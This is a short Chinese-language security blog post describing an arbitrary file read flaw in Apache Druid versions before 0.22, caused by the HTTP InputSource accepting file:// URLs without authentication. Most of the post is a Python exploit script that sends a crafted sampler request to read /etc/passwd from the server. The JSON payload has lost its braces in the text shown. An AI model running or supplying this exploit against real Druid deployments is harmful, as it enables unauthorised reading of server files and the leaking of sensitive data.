Apache Druid 任意文件读取

Posted 2021-12-22 ying-hack

Apache Druid 任意文件读取

漏洞影响版本

Apache Druid Version < 0.22

漏洞概述

对用户指定的 HTTP InputSource 没有做出限制，可以通过将文件 URL 传递给 HTTP InputSource 来绕过应用程序级别的限制。由于 Apache Druid 默认情况下是缺乏授权认证，攻击者可利用该漏洞在未授权情况下，构造恶意请求执行文件读取，最终造成服务器敏感性信息泄露。

漏洞复现

利用file协议来读取文件

python exp

读取/etc/passwd

import requests
import json
url = "http://127.0.0.1/druid/indexer/v1/sampler?for=connect"
headers = 
    "Content-Type": "application/json"

data = "type":"index","spec":"type":"index","ioConfig":"type":"index","inputSource":"type":"http","uris":["file:///etc/passwd"],"inputFormat":"type":"regex","pattern":"(.*)","listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965","columns":["raw"],"dataSchema":"dataSource":"sample","timestampSpec":"column":"!!!_no_such_column_!!!","missingValue":"1970-01-01T00:00:00Z","dimensionsSpec":,"tuningConfig":"type":"index","samplerConfig":"numRows":500,"timeoutMs":15000
r = requests.post(url,headers=headers,data=json.dumps(data),timeout=3)
print(r.content.decode())